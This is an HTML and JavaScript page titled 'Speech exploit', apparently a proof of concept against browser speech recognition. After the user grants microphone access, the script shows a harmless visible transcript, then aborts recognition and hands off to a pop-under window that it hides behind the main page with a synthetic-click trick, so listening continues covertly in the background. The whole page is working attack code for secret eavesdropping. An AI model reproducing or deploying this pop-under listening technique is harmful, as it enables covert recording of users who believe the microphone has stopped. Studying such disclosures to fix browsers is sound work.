<!DOCTYPE html>
<html>

<head>
  <title>Speech exploit</title>
</head>

<body>
  <button id="speechButton">Activate Speech Recognition</button>

  <div id="instructions" style="display: none;">Say something!</div>
  <div id="transcript"></div>
  <div id="success" style="display: none;">It works!
    <a href="https://dvcs.w3.org/hg/speech-api/raw-file/tip/speechapi.html#security">Click here to read more about SpeechRecognition</a>
  </div>

  <script type="text/javascript">
    "use strict";
    var newwindow;

    function SpeechRecognitionHotness() {

      // the following code opens the popunder... based on https://github.com/tuki/js-popunder
      newwindow = window.open('popup.html', 'listener', 'height=500,width=450');
      newwindow.blur();
      newwindow.opener.window.focus();
      window.self.window.focus();
      window.focus();
      var nothing = '';
      var ghost = document.createElement("a");
      ghost.href = "data:text/html,<scr" + nothing + "ipt>window.close();</scr" + nothing + "ipt>";
      document.getElementsByTagName("body")[0].appendChild(ghost);
      var clk = document.createEvent("MouseEvents");
      clk.initMouseEvent("click", false, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null);
      ghost.dispatchEvent(clk);
      ghost.parentNode.removeChild(ghost);

      //activate legit SpeechRecognition
      var recognition = new webkitSpeechRecognition();
      recognition.maxAlternatives = 1;
      recognition.continuous = true;
      recognition.lang = 'en-US';

      // once you have permission to capture speech.
      recognition.onstart = function (event) {
        document.getElementById('instructions').removeAttribute("style");
      };

      // when speech results are received.
      recognition.onresult = function (event) {
        //show the text received
        var transcript = event.results[event.resultIndex][0].transcript;
        document.getElementById('transcript').innerHTML = transcript;
        document.getElementById('success').removeAttribute("style");

        //stop listening legitly and activate listening in the background.
        recognition.abort();
        newwindow.startListening();
      };

      recognition.start();
    }

    //attach the function to the button.
    document.getElementById('speechButton').addEventListener('click', SpeechRecognitionHotness, false);

  </script>
</body>

</html>